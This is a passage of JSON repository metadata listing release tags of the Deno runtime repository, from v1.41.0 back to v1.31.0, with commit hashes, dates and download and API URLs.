e","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","dow